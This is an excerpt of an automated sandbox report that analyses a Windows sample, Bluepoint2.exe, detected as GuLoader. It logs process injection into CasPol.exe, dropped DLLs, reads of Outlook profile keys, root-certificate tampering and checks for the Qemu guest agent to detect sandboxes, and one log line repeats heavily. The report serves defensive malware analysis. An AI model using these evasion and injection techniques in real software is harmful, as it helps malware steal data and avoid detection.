            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Bluepoint2.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Bluepoint2.exe" Jump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Bluepoint2.exe" Jump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1D8AAAB6 AdjustTokenPrivileges,11_2_1D8AAAB6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1D8AAA7F AdjustTokenPrivileges,11_2_1D8AAA7F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile created: C:\Users\user\AppData\Roaming\5eczunoo.5prJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeFile created: C:\Users\user\AppData\Local\Temp\nsr931B.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/8@3/3
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_004021AA CoCreateInstance,2_2_004021AA
            Source: C:\Users\user\Desktop\Bluepoint2.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_00404AB5
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
            Source: Bluepoint2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.83700958185.0000000001000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_713C30C0 push eax; ret 2_2_713C30EE
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0335DAA7 push eax; ret 2_2_0335DAA8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_1D742038 push cs; ret 11_2_1D74203E
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_713C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_713C1BFF
            Source: C:\Users\user\Desktop\Bluepoint2.exeFile created: C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Bluepoint2.exeFile created: C:\Users\user\AppData\Local\Temp\lang-1026.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\Bluepoint2.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Bluepoint2.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
